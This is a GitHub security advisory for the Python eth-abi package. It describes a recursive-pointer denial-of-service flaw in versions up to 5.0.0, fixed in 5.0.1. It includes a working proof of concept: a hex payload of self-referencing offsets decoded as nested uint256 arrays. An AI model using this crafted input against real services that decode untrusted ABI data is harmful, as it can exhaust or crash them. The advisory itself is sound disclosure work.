Skip to content

eth-abi is vulnerable to recursive DoS

Moderate severity GitHub Reviewed Published Mar 4, 2024 in ethereum/eth-abi • Updated Mar 5, 2024

Package

pip eth-abi (pip)

Affected versions

<= 5.0.0

Patched versions

5.0.1

Description

This is related to recent ZST stuff (GHSA-rqr8-pxh7-cq3g), but it's a different one. Basically a recursive pointer issue

from eth_abi import decode


payload = "0000000000000000000000000000000000000000000000000000000000000020000000000000000000000000000000000000000000000000000000000000000a0000000000000000000000000000000000000000000000000000000000000020000000000000000000000000000000000000000000000000000000000000002000000000000000000000000000000000000000000000000000000000000000200000000000000000000000000000000000000000000000000000000000000020000000000000000000000000000000000000000000000000000000000000002000000000000000000000000000000000000000000000000000000000000000200000000000000000000000000000000000000000000000000000000000000020000000000000000000000000000000000000000000000000000000000000002000000000000000000000000000000000000000000000000000000000000000200000000000000000000000000000000000000000000000000000000000000020"

# OverflowError: Python int too large to convert to C ssize_t
#decode(['(uint256[][][][][][][][][][])'], bytearray.fromhex(payload))

decode(['uint256[][][][][][][][][][]'], bytearray.fromhex(payload+('00' * 1024)))

References

@pacrob pacrob published to ethereum/eth-abi Mar 4, 2024
Published to the GitHub Advisory Database Mar 5, 2024
Reviewed Mar 5, 2024
Last updated Mar 5, 2024

Severity

Moderate

Weaknesses

No CWEs

CVE ID

No known CVE

GHSA ID

GHSA-3qwc-47jf-5rf7

Source code

Credits

Checking history
See something to contribute? Suggest improvements for this vulnerability.